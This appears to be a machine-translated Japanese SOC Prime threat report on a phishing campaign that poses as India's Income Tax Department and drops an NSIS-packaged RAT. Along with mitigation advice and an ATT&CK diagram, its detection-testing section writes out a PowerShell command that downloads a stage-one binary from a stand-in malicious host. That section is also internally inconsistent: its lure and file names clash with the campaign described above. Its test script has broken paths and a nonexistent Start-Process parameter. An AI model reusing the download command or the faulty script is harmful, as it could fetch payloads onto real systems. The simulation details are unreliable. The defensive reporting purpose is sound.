SOC Prime Bias: 中程度

30 12月 2025 16:29
newspaper icon Seqrite

フィッシングキャンペーンがインドの所得税を装い企業を標的にする

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon フォローする
フィッシングキャンペーンがインドの所得税を装い企業を標的にする
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


概要

インドの所得税庁を装ったフィッシング作戦が、罠が仕掛けられたPDFを届け、受け手を偽のコンプライアンス・ポータルに誘導します。サイトは被害者に対し、署名されたNSISインストーラを含むZIPパッケージをダウンロードするよう促し、これが複数段階のリモートアクセス型トロイの木馬を展開します。RATはWindowsサービスを作成して持続し、非標準ポートで複数のC2サーバーと通信します。

調査

研究者は、PDFルアー、埋め込まれたURL、および連鎖したNSISインストーラのワークフローを分析しました。ディスクにドロップされたバイナリ、隠されたインストールフォルダの作成、およびの登録を文書化しました。 NSecRTS.exe をWindowsサービスとして。記事はまた、3つのIPアドレスへの外向き通信と、配信チェーン全体で署名されたペイロードの使用を明らかにしました。

緩和策

境界とプロキシコントロールを通じて悪意のあるドメインおよび関連するIPアドレスをブロックします。税金をテーマにした添付ファイルや偽装されたコンプライアンス・ポータルに誘導するリンクをフラグするために、メール保護を強化します。可能であれば、信頼されていないインストーラの自動実行を防ぎ、特に「Windows Real-time Protection Service」という名前のサービス作成に注意を払いましょう。 「Windows Real-time Protection Service」。

対応策

感染チェーンに関連するリストされたファイル名、ハッシュ、およびWindowsサービス登録アクティビティをアラートします。影響を受けたエンドポイントを隔離し、メモリとディスクイメージを取得し、追加のRAT段階やツールを特定するためにフルフォレンジックを実施します。永続性アーティファクトを削除し、再侵入を防ぐために潜在的に露出した資格情報をリセットします。

graph TB %% クラス定義 classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 classDef file fill:#e6e6e6 %% ノード – アクション(MITRE 技術) action_phishing_attachment[“<b>アクション</b> – T1566.001: <b>スピアフィッシング添付ファイル</b><br/>悪意のあるPDF「Review Annexure.pdf」を含むメールが被害者に送信される。”] class action_phishing_attachment action action_phishing_link[“<b>アクション</b> – T1566.002: <b>スピアフィッシングリンク</b><br/>PDFには偽の所得税ポータル(hxxps://www.akjys.top/)へのリンクが含まれる。”] class action_phishing_link action action_user_execution[“<b>アクション</b> – T1204.002: <b>ユーザー実行</b><br/>被害者がリンクをクリックすると、ZIPファイルが自動ダウンロードされ、インストーラーが実行される。”] class action_user_execution action action_code_signing[“<b>アクション</b> – T1553.002: <b>コード署名</b><br/>正規に見える証明書で署名されたNSISインストーラー。”] class action_code_signing action action_signed_binary_proxy[“<b>アクション</b> – T1218: <b>署名済みバイナリによるプロキシ実行</b><br/>署名済みNSISインストーラーが悪意のあるペイロードを起動し、制御を回避する。”] class action_signed_binary_proxy action action_obfuscation[“<b>アクション</b> – T1027.002: <b>ソフトウェアパッキング</b><br/>複数段階のNSISラッパーが悪意のあるバイナリを暗号化・隠蔽する。”] class action_obfuscation action action_persistence_service_perm[“<b>アクション</b> – T1574.010: <b>サービスファイル権限の弱点</b><br/>インストーラーがサービスファイルの権限を変更する。”] class action_persistence_service_perm action action_persistence_service[“<b>アクション</b> – T1569.002: <b>サービス実行</b><br/>NSecRTS.exeをWindowsサービス「Windows Real-time Protection Service」として登録する。”] class action_persistence_service action action_discovery_system[“<b>アクション</b> – T1082: <b>システム情報探索</b><br/>RATがOSバージョンおよびハードウェア情報を収集する。”] class action_discovery_system action action_discovery_software[“<b>アクション</b> – T1518: <b>ソフトウェア探索</b><br/>RATがインストール済みのアプリケーションおよびサービスを列挙し、データを C:\Program Files\Common Files\NSEC\Data に保存する。”] class action_discovery_software action action_c2_web[“<b>アクション</b> – T1071.001: <b>Webプロトコル</b><br/>HTTP/HTTPS を使用したC2通信。”] class action_c2_web action action_c2_nonstandard[“<b>アクション</b> – T1571: <b>非標準ポート</b><br/>C2通信にポート 48991、48992、3898 を使用する。”] class action_c2_nonstandard action action_c2_bidirectional[“<b>アクション</b> – T1102.002: <b>双方向Webサービス</b><br/>サーバーとの双方向通信を可能にする。”] class action_c2_bidirectional action action_remote_access[“<b>アクション</b> – T1219: <b>リモートアクセスツール</b><br/>攻撃者がコマンドを実行し、データを流出させ、制御を維持する。”] class action_remote_access action action_exfiltration_scheduled[“<b>アクション</b> – T1029: <b>スケジュール転送</b><br/>収集されたデータが定期的にC2サーバーへPOST送信される。”] class action_exfiltration_scheduled action action_defense_evasion[“<b>アクション</b> – T1070.004: <b>ファイル削除</b><br/>ローダーが実行後に作成されたファイルや一時フォルダーを削除する。”] class action_defense_evasion action action_multi_stage[“<b>アクション</b> – T1104: <b>マルチステージチャネル</b><br/>連続するインストーラーが最終的なRATペイロードを配信する。”] class action_multi_stage action %% ノード – ツール / ファイル / マルウェア tool_nsis_installer[“<b>ツール</b> – <b>名称</b>: NSIS インストーラー<br/><b>説明</b>: ペイロードを展開するために使用される署名済みインストーラー。”] class tool_nsis_installer tool malware_rat[“<b>マルウェア</b> – <b>名称</b>: NSEC RAT<br/><b>説明</b>: システム全体を制御可能なリモートアクセス型トロイの木馬。”] class malware_rat malware file_pdf[“<b>ファイル</b> – <b>名称</b>: Review Annexure.pdf<br/><b>種類</b>: 悪意のあるPDF添付ファイル。”] class file_pdf file file_zip[“<b>ファイル</b> – <b>名称</b>: Review Annexure.zip<br/><b>種類</b>: NSISインストーラーを含むアーカイブ。”] class file_zip file file_exe[“<b>ファイル</b> – <b>名称</b>: NSecRTS.exe<br/><b>種類</b>: Windows に登録されたサービス実行ファイル。”] class file_exe file %% 接続 – 攻撃フロー action_phishing_attachment –>|含む| file_pdf file_pdf –>|リンク先| action_phishing_link action_phishing_link –>|導く| file_zip file_zip –>|実行される| action_user_execution action_user_execution –>|使用する| tool_nsis_installer tool_nsis_installer –>|署名されている| action_code_signing action_code_signing –>|有効化する| action_signed_binary_proxy action_signed_binary_proxy –>|難読化に使用| action_obfuscation action_obfuscation –>|生成する| malware_rat malware_rat –>|インストールされる| action_persistence_service_perm action_persistence_service_perm –>|有効化する| action_persistence_service action_persistence_service –>|実行する| file_exe file_exe –>|収集する| action_discovery_system file_exe –>|収集する| action_discovery_software action_discovery_system –>|データ送信先| action_c2_web action_discovery_software –>|データ送信先| action_c2_web action_c2_web –>|使用ポート| action_c2_nonstandard action_c2_web –>|使用チャネル| action_c2_bidirectional action_c2_bidirectional –>|提供する| action_remote_access action_remote_access –>|実行する| action_exfiltration_scheduled action_exfiltration_scheduled –>|引き起こす| action_defense_evasion action_defense_evasion –>|前段階| action_multi_stage %% スタイル class tool_nsis_installer, file_pdf, file_zip, file_exe tool class malware_rat malware class action_* action

攻撃フロー

シミュレーション実行

前提条件: テレメトリー&ベースラインのプレ・フライトチェックが合格している必要があります。

根拠: このセクションでは、検出ルールをトリガーするためにデザインされた攻撃者のテクニック(TTP)の正確な実行を詳細に説明します。コマンドとナarrativesは識別されたTTPを直接に反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目的としています。

  • 攻撃の物語とコマンド:
    攻撃者が「所得税通知」というタイトルのフィッシングメールを送信します。添付ファイルは悪意のあるWord文書で、次をドロップします setup_Ir5swQ3EpeuBpePEpew=.exe to %TEMP%。被害者がファイルを実行すると、それは次を生成します Sibuia.exe (真のペイロード)を自分の子として。この子親のチェーンは一般的なプロセス作成アラートを回避するようデザインされていますが、Sigmaルールによってキャッチされます。

    侵害されたホストで実行されたステップ:

    1. 第一段階バイナリをドロップする: 
      $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1
    2. 第一段階バイナリを実行する: 
      Start-Process -FilePath $stage1 -NoNewWindow
    3. 第一段階バイナリが内部で第二段階バイナリを同じディレクトリに作成して起動します: Sibuia.exe (以下のテストスクリプトでシミュレートします。) (以下のテストスクリプトでシミュレートします。)

  • 回帰テストスクリプト:
    以下のスクリプトは、ルールをトリガーするのに必要な正確な親子関係を再現します。

    # -------------------------------------------------
# インド所得税フィッシングチェーンのシミュレーション
# -------------------------------------------------
# パスを定義
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
$stage2 = "$env:TEMPSibuia.exe"

# ダミーバイナリを作成(ゼロバイト – Sysmonログに十分)
Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII
Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII

# ファイルが実行可能であることを確認(Windowsにはchmodが不要)
Write-Host "[*] Stage1を開始します..."
$proc1 = Start-Process -FilePath $stage1 -PassThru

# stage1がstage2を“生成”するのに瞬間を与える(直接起動でシミュレート)
Start-Sleep -Milliseconds 500

Write-Host "[*] stage1がstage2 (Sibuia.exe)を生成中..."
$proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id

Write-Host "[+] シミュレーション完了。SIEMでの検出を確認してください。"
# -------------------------------------------------

  • クリーンアップコマンド:
    アーティファクトを削除し、残存するプロセスを終了します。

    # 残ったプロセスを停止
Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force
Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force

# ファイルを削除
Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue

Write-Host "[*] クリーンアップ完了。"

SOC PrimeのDetection as Codeプラットフォームに参加し ビジネスに最も関連性のある脅威に対する可視性を向上させましょう。開始して即座に価値をもたらすためには、今すぐSOC Primeの専門家とのミーティングを予約してください。

無料で参加